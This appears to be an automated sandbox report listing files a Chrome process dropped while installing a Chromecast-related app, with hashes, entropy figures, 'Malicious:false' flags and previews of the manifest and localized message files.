                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\am\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):17307
                                                                                                                                                                                Entropy (8bit):5.461848619761356
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:arfbEVrFvMP4rMhuDopC3vUuFBYZV6uml:aHEVrFvMP4KuFvr6D6uml
                                                                                                                                                                                MD5:26330929DF0ED4E86F06C00C03F07CE3
                                                                                                                                                                                SHA1:478F3B7E7A7E007BEE182B89C2EF6FFE6045E92C
                                                                                                                                                                                SHA-256:621B5139ED199022BB6529AF18ED4DC312AE9F3E90ECAF3B2C9E1D12114F5B22
                                                                                                                                                                                SHA-512:0BE6183A1BF12575C0F99960705D4249E79CDB8528C55FF132BE99A111F09494231AD6A36CD61B090A3B34C6971D68A29373BA346888E852C52E05DC14380682
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "...... ... ..... .. ...... .... ... .... ......?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": ".... ......".. },.. "1522140683318860351": {.. "message": "..... ....... .... ..... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "... ...".. },.. "1802762746589457177": {.. "message": "...".. },.. "1850397500312020388": {.. "message": ".$START_LINK$Google Home .......$END_LINK$ ... ...... Chromecast ..... .....? $START_SPAN$*$END_SPAN$",.. "placeholde
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\ar\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):16809
                                                                                                                                                                                Entropy (8bit):5.458147730761559
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:0IprKC78JmUjk8RkeryFOYPATxLZ8fsbE3/IFV6c8TEKdl:Jrp8JjA8RkerK0lc3wFV6uml
                                                                                                                                                                                MD5:44325A88063573A4C77F6EF943B0FC3E
                                                                                                                                                                                SHA1:78908D766F3E7A0E4545E7BD823C8ED47C7164EB
                                                                                                                                                                                SHA-256:67A439A08804EF4BEF261BDBADD8F0FEFD51729167D01EDCA99DD4AF57D6108B
                                                                                                                                                                                SHA-512:889C02BC986794C58C76022E78F57F867DD1D5217687F12D679A33A2DB9E5A18F3A37CF94D8FE4585E747C78E4662EAB93361FF7D945990774C7CFCACCFB79D1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": ".. .. ........ ....... .... .... ... .......".. },.. "128276876460319075": {.. "message": "...... .......".. },.. "1428448869078126731": {.. "message": "..... .......".. },.. "1522140683318860351": {.. "message": "..... ........ .... ........ ... .....".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "..... .....".. },.. "1850397500312020388": {.. "message": "... ....... .. .... Chromecast .. $START_LINK$..... Google Home$END_LINK$. $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\bg\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):18086
                                                                                                                                                                                Entropy (8bit):5.408731329060678
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:4jjpr342SIwPIasR9VhMkACVmrv8evj+3eXivOMbb2vVzCkwRV6V6c8TEKdl:4ZrYo+rxT+qOV6V6uml
                                                                                                                                                                                MD5:6911CE87E8C47223F33BEF9488272E40
                                                                                                                                                                                SHA1:980398F076BB7D451B18D7FDE2DE09041B1F55AD
                                                                                                                                                                                SHA-256:273DEF0F67F0FA080802B85EF6F334DE50A19408F46BDF41F0F099B1F5501EEA
                                                                                                                                                                                SHA-512:CDB69405BB553E46DCF02F71B1A394307D0051E7FA662DFFEBA7888F30DD933F13C7FD6E32F1D7AEAEE8746316873B6E1D92029724ABDC75E49DCC092172EA22
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": "... .. ........ ......... ...... ...-..... ....... ..?".. },.. "128276876460319075": {.. "message": "......... .. ..........".. },.. "1428448869078126731": {.. "message": "........ .. .........".. },.. "1522140683318860351": {.. "message": "........... .. .. ........ ...., ........ .......".. },.. "1550904064710828958": {.. "message": "......".. },.. "1636686747687494376": {.. "message": ".......".. },.. "1802762746589457177": {.. "message": ".... .. .....".. },.. "1850397500312020388": {.. "message": "....... .. ............ .. Chromecast . $START_LINK$............ Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "p
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\bn\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):19695
                                                                                                                                                                                Entropy (8bit):5.315564774032776
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:PrUCrcTIOeswIW/Vre/sZn8TFfzheV6uml:lPswIWtoK8xfG6uml
                                                                                                                                                                                MD5:F9DDF525C07251282A3BFFCEE9A09ABB
                                                                                                                                                                                SHA1:A343A078E804AF400A8F3E1891E3390DA754A5CD
                                                                                                                                                                                SHA-256:C69C6C90F7EB8F10685CD815AF1F6F1B87CF30C4E8D95DF1D577DE1105AAD227
                                                                                                                                                                                SHA-512:EBD339C37162984672513019D470B92DF8B743DD69D4430361EF12D42FD1C208DBDE818A7BFE20BE8A7D63CD6E02B3F4344DEA1C4AEDB8719D789981A49DA44C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".... ...".. },.. "1213957982723875920": {.. "message": "..... ....... ..... ........... ...... ....... ...... ...?".. },.. "128276876460319075": {.. "message": "...... ........".. },.. "1428448869078126731": {.. "message": "...... ......... ...".. },.. "1522140683318860351": {.. "message": "..... .... ...... ....... ... ... .... ...... .....".. },.. "1550904064710828958": {.. "message": ".........".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": ".....".. },.. "1850397500312020388": {.. "message": "$START_LINK$ Google
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\ca\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15518
                                                                                                                                                                                Entropy (8bit):5.242542310885
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:drGUBKxMF2ayv8FrIccUVFmwf+7d9VKS3V6uml:dCUBKxMFBy0FE3UzmQ+zkSl6uml
                                                                                                                                                                                MD5:A90CF7930E7C3BEC61EE252DEFAD574A
                                                                                                                                                                                SHA1:F630CA01114A7BDD39607CB84B8280CCE218A5C6
                                                                                                                                                                                SHA-256:A533740E17559E2ADF40B4555C60F21EEC84E92C09CDBC19EED033A0B4DD2474
                                                                                                                                                                                SHA-512:598F991B344FA6724617D6CE57BB0D6D64EF86B4F5317BF6AD5EDF43E6B0A385094E7885F7A8FA2B107405B31C3D9F76E92315BC1D9BB52ACD4ECAD342917DE1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Es congela".. },.. "1213957982723875920": {.. "message": "Quina de les opcions.seg.ents descriu millor la vostra xarxa?".. },.. "128276876460319075": {.. "message": "Detecci. de dispositius".. },.. "1428448869078126731": {.. "message": "Flu.desa del v.deo".. },.. "1522140683318860351": {.. "message": "S'ha produ.t un error en la connexi.. Torneu-ho a provar.".. },.. "1550904064710828958": {.. "message": "Correcta".. },.. "1636686747687494376": {.. "message": "Perfecta".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Pots veure el Chromecast a l'$START_LINK$aplicaci. Google.Home$END_LINK$?$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\cs\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15552
                                                                                                                                                                                Entropy (8bit):5.406413558584244
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:eVdprJrG5efiTk93ebrxZR1fdc8VDCwT9fTV6c8TEKdl:2rMqiQerxQ88W7V6uml
                                                                                                                                                                                MD5:17E753EE877FDED25886D5F7925CA652
                                                                                                                                                                                SHA1:8E4EC969777CC0CEB7C12D0C1B9D87EBBB9C4678
                                                                                                                                                                                SHA-256:C562FCCFCE374D446BFAC30AC9B18FF17E7A3EF101C919FF857104917F300382
                                                                                                                                                                                SHA-512:33D61F6327FC81D7A45AA2CC97922DC527F5F43E54AA1A1638DA6EE407024A2F10CFD82CC5C3C581C2E7B216276987CB26C3FA95198572E139ACF29CC5B7ADCB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Video zamrz.".. },.. "1213957982723875920": {.. "message": "Kter. popis nejl.pe vystihuje va.i s..?".. },.. "128276876460319075": {.. "message": "Zji..ov.n. za..zen.".. },.. "1428448869078126731": {.. "message": "Plynulost videa".. },.. "1522140683318860351": {.. "message": "P.ipojen. se nezda.ilo. Zkuste to pros.m znovu.".. },.. "1550904064710828958": {.. "message": "Plynul.".. },.. "1636686747687494376": {.. "message": "Perfektn.".. },.. "1802762746589457177": {.. "message": "Hlasitost".. },.. "1850397500312020388": {.. "message": "Vid.te sv.j Chromecast v.$START_LINK$aplikaci Google Home $END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\da\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15340
                                                                                                                                                                                Entropy (8bit):5.2479291792849105
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:+Upr8XnI1MY2kPuir8j7Rd3kbTWc4QtV6c8TEKdl:FrJ1H9br8h6eZCV6uml
                                                                                                                                                                                MD5:F08A313C78454109B629B37521959B33
                                                                                                                                                                                SHA1:3D585D52EC8B4399F66D4BE88CED10F4A034FCCC
                                                                                                                                                                                SHA-256:23BF7E5EDF70291CA6D8F4A64788C5B86379EECB628E3DFA7DD83344612F7564
                                                                                                                                                                                SHA-512:9F2868AEBBF7F6167A7EA120FE65E752F9A65D1DC51072AA2413B2FDE374DA2D169D455A4788E341717F694179E6F1FA80413C080D9CD8CB397C3E84668CBFEC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Fryser".. },.. "1213957982723875920": {.. "message": "Hvilket af f.lgende udsagn beskriver bedst dit netv.rk?".. },.. "128276876460319075": {.. "message": "Enhedsregistrering".. },.. "1428448869078126731": {.. "message": "Videostabilitet".. },.. "1522140683318860351": {.. "message": "Forbindelsen blev afbrudt. Pr.v igen.".. },.. "1550904064710828958": {.. "message": "Problemfri".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Lydstyrke".. },.. "1850397500312020388": {.. "message": "Kan du se din Chromecast i $START_LINK$ Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "STAR
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\de\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15555
                                                                                                                                                                                Entropy (8bit):5.258022363187752
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:AJprM71A4qyJSwlk5KR5rtXsmvL0xhVw921YV6c8TEKdl:2re3jJS5A5rt8msA2KV6uml
                                                                                                                                                                                MD5:980FB419ED6ED94AD75686AFFB4E4C2E
                                                                                                                                                                                SHA1:871BFBCA6BCBA9197811883A93C50C0716562D57
                                                                                                                                                                                SHA-256:585C7814AFD2453232BC940252D4AE821D6E6CBCFD74A793F78E5DB8BA5342F1
                                                                                                                                                                                SHA-512:1681FA9C3BA882250A5005FB807D759EB8A634F1AA011725B1C865C0028BE7AB7BC16DC821A7F5BBFBA84C91E7D663ADE715284798E7E84E8FFF2D254488882D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "H.ngenbleiben".. },.. "1213957982723875920": {.. "message": "Welche dieser Aussagen beschreibt dein Netzwerk am besten?".. },.. "128276876460319075": {.. "message": "Ger.teerkennung".. },.. "1428448869078126731": {.. "message": "Videowiedergabequalit.t".. },.. "1522140683318860351": {.. "message": "Fehler beim Herstellen der Verbindung. Bitte versuche es noch einmal.".. },.. "1550904064710828958": {.. "message": "St.rungsfrei".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Lautst.rke".. },.. "1850397500312020388": {.. "message": "Siehst du deinen Chromecast in der $START_LINK$Google Home App$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\el\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):17941
                                                                                                                                                                                Entropy (8bit):5.465343004010711
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:S0rDuhLh41cZrP3TzDBknbpgo6djIV6uml:S0fuBh46ZD3TzDinbpgoUK6uml
                                                                                                                                                                                MD5:40EB778339005A24FF9DA775D56E02B7
                                                                                                                                                                                SHA1:B00561CC7020F7FE717B5F692884253C689A7C61
                                                                                                                                                                                SHA-256:F56BF7C171AA20038EE30B754478B69A98F3014C89362779B0A8788C7B9BEEE1
                                                                                                                                                                                SHA-512:8BED281A33EC1E4E88A9F9D62BB13FE0266C0FAF8856D1DC2A843D26DD3CE5E7D1400FD3325ABD783B0364EC4FB1188AD941D56AEB9073BC365BE0D12DE6C013
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": ".... ... .. ........ .......... ........ .. ...... ...;".. },.. "128276876460319075": {.. "message": ".......... ........".. },.. "1428448869078126731": {.. "message": "......... ......".. },.. "1522140683318860351": {.. "message": "........ ......... ......... .....".. },.. "1550904064710828958": {.. "message": ".....".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "...... ....".. },.. "1850397500312020388": {.. "message": "........ .. ..... .. Chromecast .... $START_LINK$........ Google Home$END_LINK$; $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\en\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):14897
                                                                                                                                                                                Entropy (8bit):5.197356586852831
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:2MKUOp5N7GTNMRuv6M0bIt3FXGkW6/5NkkQ9NJKJhnH3t9F410sUA+ISN6cGDSyR:VKzprogudTGkWqrKcJhdIR+V6c8TEKdl
                                                                                                                                                                                MD5:8351AF4EA9BDD9C09019BC85D25B0016
                                                                                                                                                                                SHA1:F6EC1FFD291C8632758E01C9EE837B1AD18D4DCF
                                                                                                                                                                                SHA-256:F41C82D8A4F0E9B645656D630C882BE94A0FB7F8CEC0FE864B57298F0312B212
                                                                                                                                                                                SHA-512:75672B57F21F38F97341AD76A199AD764E9FBAB2384D701BF6EB06CEFDE6C4F20F047F9051A4E30D99621E5C1FBBDB9E38E8D2B47470806704B38DA130A146CF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Freezes".. },.. "1213957982723875920": {.. "message": "Which of the following best describes your network?".. },.. "128276876460319075": {.. "message": "Device Discovery".. },.. "1428448869078126731": {.. "message": "Video Smoothness".. },.. "1522140683318860351": {.. "message": "Connection failed. Please try again.".. },.. "1550904064710828958": {.. "message": "Smooth".. },.. "1636686747687494376": {.. "message": "Perfect".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Are you able to see your Chromecast in the $START_LINK$ Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\es\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15560
                                                                                                                                                                                Entropy (8bit):5.236752363299121
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:NAgprfy1pTCukFr+1DIyDRoanvV6c8TEKdl:KMrq6FrmvV6uml
                                                                                                                                                                                MD5:8A70C18BB1090AA4D500DE9E8E4A00EF
                                                                                                                                                                                SHA1:8AFC097FA956C1317DB0835348B2DA19F0789669
                                                                                                                                                                                SHA-256:FF173D1CEF665B1234E02F11070ABD2B65230318150734579A03C7F31B4AE3F4
                                                                                                                                                                                SHA-512:140BAF40A4ABE9B8AF0855B0EBB7DFDF17869EDFC4EE1037C5EA7FDD8EDEBD4850E055B6A4D7B8782657618BCE1517813779BA01BA993CC838BB43E0BE71EEEE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Congelaci.n de im.genes".. },.. "1213957982723875920": {.. "message": ".Cu.l de las siguientes respuestas describe mejor tu red?".. },.. "128276876460319075": {.. "message": "Detecci.n de dispositivo".. },.. "1428448869078126731": {.. "message": "Fluidez del v.deo".. },.. "1522140683318860351": {.. "message": "Error en la conexi.n. Vuelve a intentarlo.".. },.. "1550904064710828958": {.. "message": "V.deo fluido".. },.. "1636686747687494376": {.. "message": "Perfecta".. },.. "1802762746589457177": {.. "message": "Volumen".. },.. "1850397500312020388": {.. "message": ".Puedes ver tu Chromecast en la $START_LINK$aplicaci.n Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\et\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15139
                                                                                                                                                                                Entropy (8bit):5.228213017029721
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:Z48bxhWYp5Ny5M63niwAKD4rrJSJ2RkPXh9P5NFP2+NBMU01jewUEVez3QOiSevy:ikxprot3lYkf/rHBc0KsUV6c8TEKdl
                                                                                                                                                                                MD5:A62F12BCBA6D2C579212CA2FF90F8266
                                                                                                                                                                                SHA1:F7E964A2D9BBDA364252BCE5CFBA3FD34FDD825E
                                                                                                                                                                                SHA-256:3EB3EB0B3B4A8E5A477D1B3C3A3891CCC7DC6B8879ECE243A7BD7C478068273D
                                                                                                                                                                                SHA-512:E300201245C00ADEC8F39D586875F8FA4607AB203572BF3CE353C1CA7CDCA05B8786810CA0CEE27E4EA54A5EFD53690F1EA7AA4148CFF472A66BB11202723566
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Hangub".. },.. "1213957982723875920": {.. "message": "Milline j.rgmistest v.idetest kirjeldab k.ige paremini teie v.rku?".. },.. "128276876460319075": {.. "message": "Seadme tuvastamine".. },.. "1428448869078126731": {.. "message": "Video sujuvus".. },.. "1522140683318860351": {.. "message": ".hendamine eba.nnestus. Proovige uuesti.".. },.. "1550904064710828958": {.. "message": ".htlane".. },.. "1636686747687494376": {.. "message": "T.iuslik".. },.. "1802762746589457177": {.. "message": "Helitugevus".. },.. "1850397500312020388": {.. "message": "Kas n.ete oma Chromecasti $START_LINK$rakenduses Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\fa\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):17004
                                                                                                                                                                                Entropy (8bit):5.485874780010479
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:rngaIprIX/t9wkjTJrs3hqaXxRQdiIMDnD+LhfHdoltV6c8TEKdl:4rin5rU1X7Qd0M9CtV6uml
                                                                                                                                                                                MD5:852BD3CFF960F1BC3A2AAB3CB3874EF9
                                                                                                                                                                                SHA1:C9F6F3C776542889FE3B67971D65ACFE048A3A0A
                                                                                                                                                                                SHA-256:D87597B6C10364501B98AA42524843F109009CCEF022D8E0170440D7F144F4C6
                                                                                                                                                                                SHA-512:2A7AE4D70E33E53EE31831CE2E61DD8DF103C4170EC483BDA14B8788E5DD536EEE84DBA340CACBDF16889C7E6465B48D82C4714E746E8A7B372D12CBDF371C95
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".... ... .......".. },.. "1213957982723875920": {.. "message": ".... .. .. ..... ... .... ... .. .. ...... ... ..... .......".. },.. "128276876460319075": {.. "message": "..... ......".. },.. "1428448869078126731": {.. "message": "..... .....".. },.. "1522140683318860351": {.. "message": "..... ...... .... ..... ...... ...... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": "..... ...".. },.. "1850397500312020388": {.. "message": ".... ......... Chromecast ... .. .. $START_LINK$ ...... Google Home$END_LINK$ ....... $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\fi\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15268
                                                                                                                                                                                Entropy (8bit):5.268402902466895
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:efMprYXiYUNpj5Coik1tXxrUhvUzSPWV6c8TEKdl:eIrjbjosdrU5WV6uml
                                                                                                                                                                                MD5:3902581B6170D0CEA9B1ECF6CC82D669
                                                                                                                                                                                SHA1:C8208AC2B1DD6D4F8BDAAE01C8BD71FFFA5A732B
                                                                                                                                                                                SHA-256:D2A8180225A83A423BB6E17343DFA8F636D517154944002ED9240411B8C0C5E1
                                                                                                                                                                                SHA-512:612FDD8A3C5051F0A4F1E11E50B5D124B337C77D62D987D35C2AF9E08AFC6AFCEBAEE8D40FDFBCD1E1889F39758B96FAECBF6C6D1CF146C741A5261952050221
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Pys.htyy".. },.. "1213957982723875920": {.. "message": "Mik. seuraavista kuvaa parhaiten verkkoasi?".. },.. "128276876460319075": {.. "message": "Laitteiden tunnistaminen".. },.. "1428448869078126731": {.. "message": "Videon tasaisuus".. },.. "1522140683318860351": {.. "message": "Yhteys ep.onnistui. Yrit. uudelleen.".. },.. "1550904064710828958": {.. "message": "Tasainen".. },.. "1636686747687494376": {.. "message": "T.ydellinen".. },.. "1802762746589457177": {.. "message": "..nenvoimakkuus".. },.. "1850397500312020388": {.. "message": "N.etk. Chromecastisi $START_LINK$Google Home .sovelluksessa$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\fil\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15570
                                                                                                                                                                                Entropy (8bit):5.1924418176212646
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:+esprzAsQp68wIJYkMyr2k0jR1/7Rr1uV6c8TEKdl:Gr78JDMyrR0tJuV6uml
                                                                                                                                                                                MD5:59483AD798347B291363327D446FA107
                                                                                                                                                                                SHA1:C069F29BB68FA7BA2631B0BF5BBF313346AC6736
                                                                                                                                                                                SHA-256:DD47530EAE96346CD4DC3267A0BB1091BB17B704803A93CDA2E3E81551B94F12
                                                                                                                                                                                SHA-512:091595CA135E965ED3DE376873541117F0E7A8EBDEB4714833EFDD6C820234373891BE5DEC437BA85CCB79CCCA053D407E6ADA17EBDAE7D313324A48775C0010
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
